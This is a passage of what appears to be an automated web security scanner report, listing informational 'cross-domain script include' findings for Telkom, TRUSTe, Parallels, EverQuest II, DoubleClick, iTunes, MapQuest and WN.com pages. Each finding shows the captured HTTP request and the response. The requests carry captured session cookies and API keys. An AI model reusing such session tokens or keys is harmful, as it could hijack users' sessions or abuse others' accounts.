       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.6. http://beta.telkom.co.id/pojok-media/berita-telkom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pojok-media/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:19:52 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 35505
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.7. http://beta.telkom.co.id/pojok-media/siaran-pers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pojok-media/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:19 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 36299
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.8. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:50 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 31251
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.9. http://beta.telkom.co.id/products-services/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products-services/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:27 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 466921
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Produc
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.10. http://beta.telkom.co.id/produk-layanan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /produk-layanan/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:15 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 467326
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>Produk
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
19.11. http://clicktoverify.truste.com/pvr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certi
...[SNIP]...
</script>
-->
<script type="text/javascript" src="//www.google.com/jsapi?key=ABQIAAAADt6BAnD8dtel7ntjLPvCuhQzG-EGDF6M_DW9NZrYgzPLAWeW3RSMGuC347e2oypc5xlBLRH7xra_HA">
</script>
...[SNIP]...
19.12. http://download1.parallels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download1.parallels.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Host: download1.parallels.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=d7aaa062b220f34045ee842b61dd35f8; __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/portal/sidebar.php; __utma=1.1253792871.1305655713.1306182369.1306243398.5; s_vnum=1337191716908%26vn%3D5

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Fri, 24 Jun 2011 14:51:23 GMT
ETag: "714001-59a5-3579f300"
Last-Modified: Sat, 18 Dec 2010 16:59:24 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 22949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Comp
...[SNIP]...
</script><script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
19.13. http://everquest2.com/free_to_play  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<!--ads-->
   <script src="http://ads.bluelithium.com/pixel?id=967043&amp;t=1" type="text/javascript"></script>
   <script src="http://thesearchagency.net/tsawaypoint.php?siteid=691&amp;wayid=3695" type="text/javascript"></script>
...[SNIP]...
19.14. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 24 Jun 2011 17:04:24 GMT
Expires: Fri, 24 Jun 2011 17:04:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1461
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "Metlife" c/o "Neo@Ogilvy", segment: 'MetLife Homepage (With Recencies)' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6171&pixelID=64973&pixelID=64974&partnerID=9&clientID=1721&key=segment&returnType=js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=48314;sz=1x1;ord=1?"width="1" height="1" border="0" alt=""><script src="http://i.simpli.fi/dpx.js?cid=155&pid=0&action=101&segment=MetLife&m=1"></script>
...[SNIP]...
19.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=60&slotname=2204023174&w=468&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921637628&bpp=5&shv=r20110615&jsv=r20110616&correlator=1308921637930&frm=4&adk=1151138738&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=1&dtd=426&xpc=k1mQeRIDm4&p=http%3A//phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:20:39 GMT
Server: cafe
Cache-Control: private
Content-Length: 1454
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.adroll.com/j/rolling.js"></script>
...[SNIP]...
19.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921638309&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=2204023174%2C2204023174&correlator=1308921637930&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=3&dtd=239&xpc=fnPwSS2C0i&p=http%3A//phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:20:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 8908
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
<!-- Code auto-generated on Wed Apr 06 15:38:22 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js"></script>
...[SNIP]...
19.17. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/exxon-mobil-fuel-finder/id397136849

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/exxon-mobil-fuel-finder/id397136849?mt=8 HTTP/1.1
Host: itunes.apple.com
Proxy-Connection: keep-alive
Referer: http://www.exxonmobilstations.com/mobileapps.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 13:32:34 GMT
x-apple-orig-url-path: /us/app/exxon-mobil-fuel-finder/id397136849?mt=8
x-apple-application-site: ST11
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Fri Jun 24 06:32:34 PDT 2011, Expires Fri Jun 24 06:33:34 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?mt=8&id=397136849&cc=us
x-apple-application-instance: 2096001
Content-Type: text/html
x-webobjects-loadaverage: 0
Content-Length: 33296
Vary: Accept-Encoding
Cache-Control: no-transform, max-age=60
Date: Fri, 24 Jun 2011 13:32:34 GMT
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</script>


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/62BB/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/62BB/web-storefront-preview.jsz"></script>
...[SNIP]...
19.18. http://listings.mapquest.com/apps/listing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://listings.mapquest.com
Path:   /apps/listing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/listing HTTP/1.1
Host: listings.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=apps1~62851C09A172E80EE111FF19DB732EFC; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1308924951904-New%7C1371996951904%3B%20s_nrgvo%3DNew%7C1371996951906%3B

Response

HTTP/1.1 200 OK
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 14:15:58 GMT
Content-Length: 6388

<!doctype html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link rel="stylesheet" href="wl-mq.css" type="text/css"><title>Create your MapQuest account</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js" type="text/javascript" charset="utf-8"></script><script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//s.aolcdn.com/omniunih.js"></script>
...[SNIP]...
19.19. http://newerforms.wn.com/form/ad_enquiry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newerforms.wn.com
Path:   /form/ad_enquiry/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /form/ad_enquiry/ HTTP/1.1
Host: newerforms.wn.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=67; __unam=6e7de7f-130c1d53330-7dd7c096-1

Response

HTTP/1.1 200 OK
Vary: Cookie
Content-Type: text/html; charset=utf-8
Date: Fri, 24 Jun 2011 16:02:15 GMT
Server: lighttpd/1.4.19
Content-Length: 15365

<html>
<head>
<title>ad_enquiry</title>

<link href="/media/css/datePicker.css" type="text/css" media="screen" rel="stylesheet" />
<script type="text/javascript" src="/media/js/jq
...[SNIP]...
<fieldset id="captcha">


<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lc4KwAAAAAAADuGvcxSC6fqKmBLqhCk3x5kSSzq"></script>
...[SNIP]...
19.20. http://newerforms.wn.com/form/sitemap_feedback/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newerforms.wn.com
Path:   /form/sitemap_feedback/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /form/sitemap_feedback/ HTTP/1.1
Host: newerforms.wn.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=67; __unam=6e7de7f-130c1d53330-7dd7c096-1

Response

HTTP/1.1 200 OK
